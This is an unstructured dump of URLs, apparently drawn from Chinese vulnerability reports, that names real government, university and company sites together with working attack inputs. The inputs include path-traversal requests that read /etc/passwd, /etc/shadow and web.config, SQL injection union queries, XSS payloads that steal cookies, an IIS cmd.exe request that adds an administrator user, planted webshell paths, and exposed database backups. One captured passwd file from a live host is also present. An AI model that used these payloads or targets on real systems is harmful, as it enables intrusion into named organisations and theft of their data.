www.job.ynu.edu.cn/wwwroot.rar https://www.google.com.hk/webhp?hl=zh-CN#hl=zh-CN&newwindow=1&q=inurl:truecms%2Fapp&safe=strict http://youth.muc.edu.cn/dede/login.php?gotopage=%2Fdede%2Findex.php url:eaptag2/pages/examples/demo/index.html http://gj.hn118114.cn http://59.50.113.197:1680 
http://123.139.154.42:9080/ http://58.63.38.180:9080 http://360ants.com/relogin.jsp http://library.cup.edu.cn/index.html http://222.240.139.236:9080/eapsoa/AjaxAdapter http://www.183read.com/ http://www.sanfu.com/frame.php?frame=%E5%87%BA%E8%A http://xny.ctgu.edu.cn/EMS_Download.php?bid=23 http://stock.pingan.com/jijinchaoshi/jijinxinwen/jijinnewinfo.iface?id=447239135223 http://cdc.cma.gov.cn/yhzn.do?method=getContent&typeId=25 http://work.cnpostair.com/Items/Ver_Detail.aspx?ID=100220/FM9521 site:bbs.tuniu.com inurl:space http://data.jxteacher.com/search/ http://stock.pingan.com/jijinchaoshi/jijinxinwen/ji http://www.weimob.com/site/wenda?page=1&ids=1 http://www.weimob.com/site/wenda?page=1&ids=1 http://42.96.167.239/product!index.action?id=307526 http://42.96.167.239/product!index.action http://42.96.167.239/guige.jsp http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/default.aspx http://www.cpac.com.cn/manage/default.aspx http://portal.****.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=8387&config_id=6144选取随便一个新闻页面 http://job.352.com/hr/index1.jsp http://www.352.com/upimages/1398427286577.html http://www.352.com/upimages/1398426054115.html http://www.352.com/upimages/1398431329174.html https://register.352.com/login/findbackPassword_1.jsp?msg=%E6%B5%8B%E8%AF%95 http://english.352.com/manager/html http://www.tengcon.com/download/T9_Hardware_Manual_V01.201106.rar http://www.sanfu.com/?do=../../../../../../../../../../etc/passwd%00.jpg&id=6618&mod=goods http://www.sanfu.com/?do=display&id=6618&mod=../../../../../../../../../../etc/passwd%00.jpg http://cms.baa.bitautotech.com http://dag.whu.edu.cn/css.asp http://ndnews.imu.edu.cn/18da/dede/login.php?gotopage=%2F18da%2Fdede%2Findex.php http://222.240.168.145/PRTVUWeb/pages/common/frameset.jsp id:70072试试 http://www.sanfu.com/?mod=ucp&do=orderlist&action=close&order_id=70072 id:34847 http://www.sanfu.com//ajax.php?action=del_consignee&id=34847&_=1398447445017 
http://yingxiao.baidu.com/blog/article/530.html http://jtj.nanhai.gov.cn:80/NHPORTALGIS/nhjt/JTService/LineMatch.asmx/GetLineSet http://210.45.204.8/ReadNews.asp?NewsID=638&BigClassName=%B2%CE%BF%BC%D7%C9%D1%AF&SmallClassName=%BF%C6%BC%BC%B2%E9%D0%C2&SpecialID=0 http://210.45.192.200/xljk/news_detail.asp?id=150 http://bbs.ganji.com/ http://111.75.255.55/szxx/Gongkai.aspx?xfid=3131128101751 http://jcy.jinhu.gov.cn/ http://jcy.jinhu.gov.cn/admin/admin_login.asp http://jcy.jinhu.gov.cn/11.asp http://m.jxteacher.com/bm/xg_login.aspx,参数txtCardId可被注入 http://www.bankkf.com/ http://iphone.10010.com/iphome.zip http://bbs.8264.com/forum.php?mod=viewthread&tid=2116822&extra= fuck4.asp/这个目录~~利用iis6.0解析直接就可以了~~ http://cpms.e-chinalife.com/xycms/xycms/ArtiSearch.do encap:Ethernet F4:CE:46:81:86:96 addr:10.24.81.6 Bcast:10.24.81.255 Mask:255.255.255.0 f6ce:46ff:fe81:8696/64 Scope:Link MTU:1500 packets:84558792 packets:81148393 txqueuelen:1000 http://117.79.131.147:8080/index.html http://vcaps.neu.edu.cn/adminLogin.action http://wap.baidu.com.cn/tc?src=ss-linkchain.com/OLDRLEOVJJA1JY http://jichu.neu.edu.cn:80/index.php?md=lanmu&msid=7&lid=6 http://sba.neu.edu.cn/neu/index/DeptInfo.asp?Dept_Id=17 http://406089362.blog.sohu.com/ http://www.jingwei.com/follow/followusers http://www.jingwei.com/follow/followusers http://www.jingwei.com/profile/?uid=-4039385&type=news&page=1&count=10 http://vip.club.sohu.com/xjlkp/list.php?tag=5%27+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23 http://wenku.baidu.com/view/26359187bceb19e8b8f6bae0.html http://sxzz.qhu.edu.cn/admin888/login.php http://www.gzsrd.gov.cn/leaders/2013/list_3.html http://www.7898.biz/index.htm) http://www.365tkt.com/ http://www.365tkt.com/jnzz/ http://www.chinajob.com.cn/jobweb/newslist.asp?class=007 http://www.chinajob.com.cn/gjrc/news.asp?id=121 http://www.buffalo-china.com/products/product_details.php?id=206 http://www.ahong.com.cn/phpmyadmin/ http://www.ahong.com.cn/phpinfo.php http://116.228.55.9/ 
http://116.228.55.9:8081/1.zip http://116.228.55.9:8081/2.zip http://116.228.55.9:8081/3.zip http://116.228.55.9/111.zip http://www.cappse.org.cn/newscon.php?id=6&tid=100 http://www.haierpeople.cn http://www.chncla.com/chinese/download/Showdownload.asp?ID=958&ClassID=27 http://XXX.XXX.XXX.XXX/.../.../windows/system32/cmd.exe?/c+net+user+admin+admin+/add”加用户等 http://www.shodanhq.com/search?q=MS-MFC-HttpSvr%2F1.0++country%3ACN http://202.108.14.246/django/login/ http://202.108.14.246/php/ http://zwzx.gzwuchuan.gov.cn/application/ztxz/xzjj.jsp?type=81&departid=11 http://website.96533.com/default.asp,存在SQL盲注漏洞,可爆预约用户信息,包括车牌等,以及主站库: http://www.wscwh.baoying.gov.cn/index_map.action?departId=321203001 http://www.oice.uestc.edu.cn/list.php?id=20 http://it.11185.cn www.ccgp-jilin.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009 http://www.hao123.com/topic/2014cz www.jljs.gov.cn/kfbweb/news.php?id=32 http://www.zdjj.gov.cn/ http://www.youjoy.net/ http://www.youjoy.net/admin/login.php http://111.13.55.55/webmanage/ http://111.13.55.55/webmanage/channelchild_add.jsp?from=2&id=22&pid=2&pname=%D3%CA%CF%E http://jk.e23.cn/nx/nx_manageLogin/    dede补丁未打 http://jk.e23.cn/help.php http://jk.e23.cn/php.php http://jiwei.hebau.edu.cn/list0.php?cid=1 http://mv.17186.cn/default.aspx http://meeting.352.com/marketing/sale_item.jsp?id=77 http://www.352.com/marketing/sale_item.jsp?id=737 http://english.352.com/marketing/sale_item.jsp?id=737 http://chatservice.352.com/login.jsp https://admin.352.com/system/logon.jsp http://www.352.com/member/security/name.jsp?msg=%22%29;alert%28document.cookie%29 https://login.352.com/logon/?j=http://www.baidu.com http://www.linekong.com www.linekong.com http://m.sanfu.com/countBuy.htm?cart.barcode=32815409&cart.number=NaN&goods.id=6567 http://www.cutecms.cn/ http://m.sanfu.com/reg/newCardPast.htm http://auto.163.com/special/2014cmpx/ http://vote.news.163.com/vote2/djsonpVote.do?voteid=30099&itemid=148814&callback=votePost, 
http://job.neu.edu.cn/Char.asp http://jdyxb.jlu.edu.cn/news.php?bid=1 http://www.hnpost.com/ http://www.hnpost.com/web.rar http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966 http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966 http://mq.wsq.qq.com/226216966/like?tId=11&resType=json&isAjax=1&_=1398405189497 http://985ap.xjtu.edu.cn/research.php?cid=3 https://202.113.WW.CC/vpnweb/index.php?para=index https://115.24.ZZ.SS/vpnweb/index.php?para=index https://202.113.WW.YY/vpnweb/index.php?para=index http://123.126.32.40:8080 http://220.181.184.125 http://vip.hn118114.cn/ProductL.aspx?T=生活日用 http://jk.hn118114.cn/app_web/index.php?m=home&c=product&id=1010 http://support.you.118114.cn/userCenter/user!login.do http://passport.weibo.com/存在任意URL跳转漏洞。 http://cms.kingdee.com/solutions/business/bi/biCaseList.jsp?columnId=156201301&pageNo=1 http://bbs.hc360.com/ http://bbs.hc360.com/thread-4402403-1-1.html http://wap.abchina.com/Portal/logon/Index.aspx http://3g.paybest.cn/abc_drawing.php?drawing=4 http://3g.paybest.cn/abc_drawing.php?drawing=4 http://www.jjbhyc.com/info.asp?channel=2&classid=2&id=393 https://vpn.jd.com/,输入一个不存在的用户,会提示“用户不存在”。 http://xny.ctgu.edu.cn/EMS_ShowNews.php?bid=8&sid=0&tid=0&fid=41&id=37 http://www.3dzph.com/j2.aspx http://www.3dzph.com/l.aspx site:china-sss.com inurl:custId http://mall.china-sss.com/member/action?custId=9C0201718096 http://www.jiusenscreen.com/aboutus-show.asp?id=120 http://www.jiusenscreen.com/chisiho_china_admin/Login.asp UvJP0:15861:0:99999:7 http://www.mrlee.com.cn/admin/admin_login.aspx http://www.mrlee.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config http://mobads.baidu.com/ad.html?url=%09%2F%2Fwww.wooyun.org http://hdgt.hd.gov.cn/down.asp?filename=../conn.asp%20 http://61.191.25.187/ http://gwy.psych.cn:80/gen-image?image=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:496:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:496:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin web:x:500:500::/home/web:/bin/bash http://snsx.whu.edu.cn/下的图片库搜索处,为post注入。 http://snsx.whu.edu.cn http://dfi.bnuz.edu.cn/article.php?id=10 http://www.sanfu.com/?class_new=0&do=index_new&mod=goods&page=11&per_page=32&price=-1&style=sale http://www.sanfu.com/?class_new=0&do=index_new&mod=goods&page='&per_page=32&price=-1&style=sale 
http://nczx.yonyou.com/SubModule/ http://nczx.yonyou.com/SubModule/Role/ http://nczx.yonyou.com http://nczx.yonyou.com ftp://192.168.8.86 ftp://125.35.5.232 https://211.68.223.12/commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow http://shhj.k-touch.cn/appfen/salelist.aspx http://shhj.k-touch.cn/appfen/deallist.aspx http://www.cugb.edu.cn/research/researchSumItemList.action?bigClassId=45 http://cwc.sitsh.edu.cn:8080/Index.aspx(主页) http://cwc.sitsh.edu.cn:8080/HomeDetails_Index.aspx?actionType=srule_item&actionID=57 http://yxzy.hrbmu.edu.cn:8080/cjxy/contentPage.php?news_id=301 http://www.xiaojukeji.com/db/ http://www.xiaojukeji.com/db/config.inc.php http://utsc.guet.edu.cn/search.aspx?key=1 http://mall.china-sss.com/member/action?custId=9C0201718096 http://mall.china-sss.com http://physics.njnu.edu.cn/reports.php?typeid=&page=2 http://physics.njnu.edu.cn http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=09120113113072存在注入漏洞和越权访问 http://gacfiatauto.hz.letv.com/ http://gacfiatauto.hz.letv.com/php/vogusernum.php?callback=jQuery171032845610193908215_1398744981011&tel=1&_=1398745012738 http://101.226.1.182:88/ http://oa.xun-ao.com/admin/user/user.post.php http://oa.xun-ao.com/admin/user/user_edit.php http://www.qingdaoagri.gov.cn/qd_agri_web/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini www.yanzhou.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini www.xintai.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini http://221.214.219.38/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini http://www.sdyt.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini https://目标域名/admin/fckeditor/_whatsnew.html http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=2 http://www.e-plugger.com/右上角有个企业邮箱! 
http://www.594sgk.com/中找找e-plugger.com http://www.zgcrc.com.cn/aboutus/?id=17 http://vm-192-168-10-137.shengyun.grandcloud.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.classloader%3Aid%3D"vfsfile%3A%2Fhome%2Fmichael%2Fliferay%2Fliferay-portal-6.0.6%2Fjboss-5.1.0%2Fserver%2Fdefault%2Fdeploy%2Fhdscanner-jboss-beans.xml http://zwzx.wuchang.gov.cn/new/web/blzn/bszn.jsp?departid=73751556x http://www.ccshbx.org.cn/menu.jsp?ccn100=0103&fileName=WEB-INF/classes/SqlMapConfig.properties&PageCount=1&queryForword=pre&select1=01 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192 http://www.jzauction.com.cn/xwjt.php?xx=1183 acm.tju.edu.cn/toj/contest/show_cerror.php?cid=1&id=249 http://lab.tjmu.edu.cn/lab/getFile.jsp http://lab.tjmu.edu.cn/lab/getFile.jsp?filename=../../index.jsp下载首页文件 http://lab.tjmu.edu.cn/lab/getFile.jsp?filename=../../getFile.jsp http://iaep.nau.edu.cn/news/downfile.asp?file=../admin/defaultpro.asp http://haozhoudao.qq.com/yaoqing.html?id=111_1(id换成假的了) http://sanfu.com.cn/order/orderInfo.htm?orderInfo.id=70071 http://bbs.wangjiu.com/uc_server/admin.php?a=login&m=user http://www.dzhm.org.cn/newssearch.php?KeyWord=11 http://218.200.201.184/masmanage/mas_page/system/index.jsp https://vpn.lib.tju.edu.cn https://221.213.45.231 https://202.113.20.208 https://202.113.49.100/ https://122.226.150.69 https://gljy.cn https://202.196.119.130 https://211.82.48.60/ http://oa.xun-ao.com/admin/project_money/add.post.php http://oa.xun-ao.com/admin/project_money/add.post.php http://oa.xun-ao.com/admin/project_money/add_money.php?id=1 http://bbs.jc.pptv.com/ http://mail.deppon.com/ http://m.deppon.com/logincheck http://mail.deppon.com/gps/RetakePassword.aspx http://www.ggdaxxw.gov.cn/newsym/opentext.php?articleid=1331 http://bsqy.gov.cn/newsList.php?ArticleID=396 http://www.secri.gov.cn/index.php?articleid=112&mod=brief http://www.shangzhi.gov.cn/content.php?id=28685 http://www.chinauto.gov.cn/article_dtl.php?id=3187 
http://xxsser.duapp.com/VtK3HI?1398827830 http://redir.yy.duowan.com/redir.php?url=URL view-source:http://redir.yy.duowan.com/redir.php?url=URL%3C/script%3E http://qun.qzone.qq.com/group#!/1150195/share http://www.jbpsq.com/shop/authorize.asp?city=0&city_hid=-1&count=0&count_hid=&kword=1&prov=0&prov_hid=%d5%e3%bd%ad%ca%a1&submit=%b2%e9%d1%af http://help.tiantian.com; http://help.tiantian.com/resp/pensong.aspx; http://help.tiantian.com/resp/pensong.aspx http://www.jlmz.com.cn/detail/GoodDetail.aspx?goods_ID=34142&actPrice=aib.oo http://www.sanfu.com/?mod=ucp&do=address http://alumni.blcu.edu.cn:12881/uploads/plus/flink_add.php url:http://www.hdzfcg.gov.cn/hdcgweb/index.do http://www.jmyan.com/thread-105906-1-1.html http://115.182.51.171:8080/ http://360.taikang.com/fcb/safeSign.jsp配置指向 http://mall.taikang.com/ http://mall.taikang.com/DesktopModules/C_Info/web.config http://mall.taikang.com/DesktopModules/C_Info/WebService/web.config http://mall.taikang.com/webapp/policy/querypolicy/queryAccident.jsp www.moneyok.cn www.moneyok.cn https://www.moneyok.cn https://vpn.lib.tju.edu.cn https://221.213.45.231 https://202.113.20.208 https://202.113.49.100/ https://122.226.150.69 https://gljy.cn http://g.baofeng.com/ http://g.baofeng.com/event/getgoter http://g.baofeng.com/admin/login http://www.bytstrip.com/plus/flink_add.php http://www.wmgc.cn/ sxnzzx.com/****/*****.asp http://gdhg.kugou.com//worksdetail.php?musicId=2453307&period=2 http://pub.px.gw.com.cn/fckeditor/editor/fckeditor.html index.php/AbUser/getOrderDetail/ cn:8029 http://www.citrix.com.cn/articleShare/user.asp http://www.tuniu.com/u/orderdetail/3301443 http://www.tuniu.com/yii.php?r=user/user/downloadFile/&id=67[隐私处理]34&orderId=3301443 http://www.myships.com/ShipLBS/login.jsp http://www.sdngy.edu.cn/xbsz/jcb/CompHonorBig.asp?id=33 http://u.qmango.com/uploadify_jm_hotel.aspx?hotelid=45131&huserid=【USER】 http://kexie.tancheng.gov.cn/ http://kexie.tancheng.gov.cn/kjzp/zpsc/upload.asp 
http://kexie.tancheng.gov.cn/kjzp/zpsc/upload/cfwansui.asp http://www.ayx.gov.cn/admin/word/upfile.asp http://www.515weizhi.com/login.aspx账号:admin http://123.126.32.139:8080/management/index.do http://www.lawnewscn.com/plus/flink_add.php http://www.cyepb.gov.cn/Manage/Login.aspx http://59.49.20.242/ http://ma.apps.cctv.com/Enterprise/EnterpriseSearch.jsp http://jlxzxk.zjbts.gov.cn:93/UserManage/UserApply.aspx http://jlxzxk.zjbts.gov.cn:93/Login.aspx http://jlxzxk.zjbts.gov.cn:93/UploadFiles/s55555555/20140430204221662.asp http://192.168.13.107:8000/Service1.asmx http://1**.**.**.7/Service1.asmx"/ http://1.*.*.*/OpenMasService"/ http://www.tchjbh.gov.cn http://www.tchjbh.gov.cn/news_display.php?id=259 www.tchjbh.gov.cn/news_display.php?id=148 http://sqlmap.org http://www.reeyee.com http://www.reeyee.cn http://www.reeyee.net http://www.cheryacteco.com http://www.cheryplus.com http://www.picc-js.com http://www.bqls.net http://www.tx-hoto.com http://www.reeyee.cn/case/中查看。 http://www.cheryplus.com/admin/inc/dialogbox.php?pDir=&curr_dir=../../../&type=0&filetypes=&form=frmList&formname=brief_img http://202.119.148.83/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img http://www.wiiboox.cn/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img http://www.tx-hoto.com为例,向目标/admin/inc/wnewssave.php发起如下HTTP请求,注意Cookie值及filename值: http://www.tx-hoto.com/admin/inc/wnewssave.php?formname=src&form=frmList www.tx-hoto.com http://golf.cctv.com/function/2013gold_court/search.php http://golf.cctv.com/e/extend/ask/AskResult.php drops.wooyun.org/webview.html http://g.10086.cn/spbbs/index.php http://www.foowu365.com/i.php http://www.foowu365.com/config.inc.bak数据库配置信息泄露 http://www.foowu365.com/ http://tongji.sogou.com/ http://tongji.sogou.com/login_login.action http://www.foowu365.com/bbs/uc_server http://www.t3.com.cn/ticket_-639491981123409256.htm http://news.gbicom.cn/plus/flink_add.php http://news.gbicom.cn/plus/flink.php 
http://news.gbicom.cn/gbicom/login.php http://www.pziad.com/post_problem.php http://www.pziad.com/problem.php http://m.sanfu.com/order/orderInfo.htm?orderInfo.id=70563中的orderInfo.id的值,可参考任意订单 http://m.sanfu.com/self/showUserAdd.htm?userAdd.id=36132&path=success中的userAdd.id,可查看任意用户的地址信息 https://auth.alipay.com/login/homeB.htm?redirectType=parent http://vip.yonyou.com/Admin/Adminlogin.aspx http://211.151.146.64/login.jsp http://labs.chinamobile.com/imic/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg http://www.carslan.com.cn/backup/db-backup-1396080877-f66ed7ebf21afcf3b09bdc082ec57235.sql jwc.sau.edu.cn/ACTIONSHOWFILES.APPPROCESS?mode=1&FolderID=49 jwc.sau.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=49 inurl:/ACTIONSHOWFILES.APPPROCESS?mode=1 jw.bhcy.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=104 jwc.syphu.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=88 jw.hrbeu.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=82 http://www.glfuda.com/news/newsDetail.aspx?type=nv&id=380 http://www.glfuda.com/news/newsDetail.aspx?type=nv&id=99999999 http://unicom.huacai.cn http://124.172.221.86:81/ http://124.172.221.86:81/Ftp/Pic/ http://www.cadc.gov.cn/upload/Files/GreenMail/2021/ http://www.cdwh.gov.cn/ http://alumni.sjtu.edu.cn/alumni/xiaoyaohui/shell.asp http://alumni.sjtu.edu.cn/alumni/xiaoyaohui/cmd.asp http://postd.sjtu.edu.cn/shell.asp http://postd.sjtu.edu.cn/cmd.asp http://game.letv.com/ http://game.letv.com/bbs/space.php?uid=100000005 http://202.205.99.136:8080/DpWeb/dp-web!index.action http://renrenhelper.sinaapp.com/run/list.php?uid= http://renrenhelper.sinaapp.com/run/list.php?uid=327827630 inurl:Infos/MoreInfos.aspx http://www.xmhlkj.gov.cn/file/index.asp http://www.astc.gov.cn/file/index.asp http://www.xmhlkj.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.astc.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html 
http://www.jimeikj.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.xmhlkj.gov.cn/managemodule/info/ftb.imagegallery.aspx http://www.astc.gov.cn/managemodule/info/ftb.imagegallery.aspx http://www.jimeikj.gov.cn/managemodule/info/ftb.imagegallery.aspx http://oa.letv.com/ http://hn.coop168.com/PointNewsDetails.php?articalId=448¢erid=33 http://hn.coop168.com/login.php http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB http://www.skyclass.cn/)开发的精品课程软件,用户众多 URL:http://网站地址/sc8/sourceindex/search-bysubject.do http://jx.swufe.edu.cn/sc8/sourceindex/search-bysubject.do?pageId=4&subjectCode=1-01 http://www.qinghua-edu.com/web.rar http://www.sxmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxycmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.jcmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxlfmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.dtcqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxszmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.yqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxfb.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.shanxilr.gov.cn:8080/content/topicdeal.jsp?id=1&action=read http://project.ccidnet.com/cases/index.shtml http://szhxy.guet.edu.cn/qxgl/public/AllNews.aspx?type=1 http://szhxy.guet.edu.cn/qxgl/public/AllNews.aspx?type=99999999 http://szhxy.guet.edu.cn/qxgl/pf/ajaxscore.htm?ScoreType=0^lsh=26253 http://3gztc.wo.com.cn/wo_pc/product.jsp?id=40610 http://3gztc.wo.com.cn/showSoft.jsp?id=10119 http://3gztc.wo.com.cn/wo_pc/list.jsp?n=jx&v0=联想&v1=20&v http://3gztc.wo.com.cn/login.jsp http://125.90.3.222/out/Bulletin/Businessview.aspx?infoflowId=01581 http://218.14.215.4/out/ViewSource/SrcStencilList.aspx?listType=&infoflowId=01570 
http://hdjl.scjt.gov.cn:98/scjt/frontSendMsgServlet?method=findMsgView&msgtype=0 http://www.meizhou.gov.cn/open/index.php?NodeID=872&u=14 http://www.zjszsf.gov.cn/actionservlet/flrzdetail.jsp?DBID=452 http://www.hyx.gov.cn/sssweb/OnlineVote/fvote.aspx?questionnaireID=9374d487-6478-487c-9d39-e7ead8bfca4a http://www.chit.org.cn/webmaster\ http://www.haijia.com.cn/ReguBusLine.aspx,存在搜索型注入 http://www.libsys.com.cn/downloadmore.php?pid=libsys5.0_setup_appserver Data:pid=libsys5.0_setup_appserver http://www.libsys.com.cn/dl_choice.php?p_type=&u_name=WCRTESTINPUT000000&p_code=WCRTESTINPUT000001&cert=WCRTESTINPUT000002&duty=WCRTESTINPUT000003&dept=WCRTESTINPUT000004&email=WCRTESTINPUT000005& Data:p_type=&u_name=WCRTESTINPUT000000&p_code=WCRTESTINPUT000001&cert=WCRTESTINPUT000002&duty=WCRTESTINPUT000003&dept=WCRTESTINPUT000004&email=WCRTESTINPUT000005& http://www.libsys.com.cn/downloadfile.php?pid=libsys5.0all http://www.fadongxi.com/ http://www.diji.com.cn:8080/landregister/index.action http://training.chinanetwork.net.cn/webv9/Part/PatrolInfo/AddressPage.aspx http://exam.sset.org.cn:8080/exam1/index.action http://st.scu.edu.cn/kyjd/DocumentView.aspx?ArticleShowID=6 http://saa.scu.edu.cn/tongzhigg/xueyuantzArticle.aspx?noticeid=43 http://jy.scu.edu.cn/jiuye/shownews.php?type_id=4&newsid=1708 http://zs.scu.edu.cn/zhaosheng/detail.php?id=4424 http://www.colorful.cn/ColorfulProductdetails.aspx?id=13014094ae9ed39042e1b7de976f95bd5f25 http://en.chinanetcenter.com/pages/about-us/i http://lafgirl.youku.com/ http://lafgirl.youku.com/!~udza7q/login.html,没发现什么问题 inurl:vpnweb/index.php?para=index https://1.202.234.22/vpnweb/index.php?para=index http://www.baidu.com/s?word=%22%3E'%3e%3Ciframe%3E http://www.shajia.cn/business_cont.php?id=749 http://www.552cai.com:8080/info/news!index.action http://youhui.buding.cn/360/destine.php?city_id=2&shop_id=1 http://ebidding.lenovo.com.cn/Dictionary/area/RegionChange.aspx?controlId=ddlRegion2&parentId=-1 http://wo.zdnet.com.cn 
http://www.sztvu.com/ http://www.sztvu.com/jyzdbgs/mdb/db1.mdb http://show.qq.com/ http://show.qq.com/?ADTAG=client.im.card.qqshow&opuin=这里改成你要登录的QQ号&ptlang=2052#u%3DphotoShow/html/index.html%253Fsex%253DUM%2526rcount%253D0 http://wanjiang.dg.gov.cn/lk_admin/login.aspx http://www.chinanetwork.com.cn/w8/pages/sys/annone.aspx?id=32bf330e-f925-4336-a625-68bd5dffc80b inurl:subclass site:server.zdnet.com.cn http://security.zdnet.com.cn/files/search.php?date=201405&subclass=707 http://stor-age.zdnet.com.cn/files/search.php?date=201405&subclass=728 http://mobile.zdnet.com.cn/files/search.php?date=201305&subclass=979 http://net.zdnet.com.cn/files/search.php?date=201405&subclass=679 http://ec.zdnet.com.cn/files/searchs.php?date=&subclass= http://video.zdnet.com.cn/files/search.php?subclass=0&t=0 http://server.zdnet.com.cn/files/search.php?subclass=0&t=0 http://download.zdnet.com.cn/files/search.php?subclass=0&t=0&p=5&sort=&brief=&manu_name=&key=&category=&os=&publish_date=&licence=&hit=&size= http://download.zdnet.com.cn/files/search.php?subclass=0&t=0&p=5&sort=&brief=&manu_name=&key=&category=&os=&publish_date=&licence=&hit=&size= http://soft.zdnet.com.cn/files/search.php?date=200710&subclass=0&p=2 http://house.xizi.com/index.php?a=list_house&areaid=88952634&price=88952634&htypeid=88952634&m=house&c=index http://bbs.xizi.com/read.php?tid=2436716&otid=&page= http://bbs.xizi.com/xz_newshow.php?action=activity&type=0 http://job.xizi.com/index.php?action=personal&option=search&extent=index http://job.xizi.com/index.php?action=member&option=login http://house.xizi.com/index.php?m=house&c=index&a=list_house&areaid=88952634&housetype=88952634&price=88952634&keywords=88952634 http://to.xizi.com/?m=discount&c=index&a=init&info%5Bstarttime%5D=88952634&info%5Bendtime%5D=88952634&dosubmit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://bbs.xizi.com/read.php?tid=3077045&mfid=719&mapper=true&otid=&page=2 http://hm.xizi.com/?m=government&c=shops&a=show&id=1711&sid=652 
http://house.xizi.com/index.php?m=house&c=index&a=list_house&listorder=avgprice-DESC http://job.xizi.com/index.php?action=personal&option=search&extent=index http://hd.xizi.com/xz_newshow.php?action=activity&type=0 http://news.zhulong.com/read_news_show_pl.asp?id=188916 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10&y=2014 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=9 http://cam.tju.edu.cn/tju/newsDetail.php?id=36 http://cam.tju.edu.cn/tju/newsList.php?viewMod=xxx http://cam.tju.edu.cn/tju/moreNews.php?viewNum=1 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=9 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10 www.weimob.com/snsmobile?id=1472&v=555c3efd5c1f6c44004dda76628f25f9&pid=95967&wechat_id=fromUsername www.colorful.cn http://www.colorful.cn/ColorfulAwards.aspx?colorfulid=4&Time=2013 http://www.colorful.cn/ColorfulNetwork_product.aspx?Cataid=12101509594818660dc6d78062fef4d73a8b 